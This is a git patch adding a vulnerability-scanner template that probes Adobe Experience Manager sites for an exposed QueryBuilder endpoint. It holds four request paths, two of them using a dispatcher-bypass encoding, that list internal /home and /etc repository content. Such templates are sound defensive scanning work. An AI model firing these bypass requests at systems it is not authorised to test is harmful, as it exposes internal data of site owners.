From a395f7cd604c78dbea0e4804a80a7e038ee957d3 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Mon, 5 Apr 2021 23:12:25 +0530
Subject: [PATCH] Create aem-querybuilder-internal-path-read.yaml

---
 .../aem-querybuilder-internal-path-read.yaml  | 25 +++++++++++++++++++
 1 file changed, 25 insertions(+)
 create mode 100644 misconfiguration/aem/aem-querybuilder-internal-path-read.yaml

diff --git a/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml b/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml
new file mode 100644
index 0000000000..5641c2e549
--- /dev/null
+++ b/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml
@@ -0,0 +1,25 @@
+id: aem-querybuilder-internal-path-read
+
+info:
+  author: DhiyaneshDk
+  name: AEM QueryBuilder Internal Path Read
+  severity: medium
+  reference: https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91
+  tags: aem
+
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1'
+      - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1'
+      - '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1'
+      - '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1'
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - jcr:path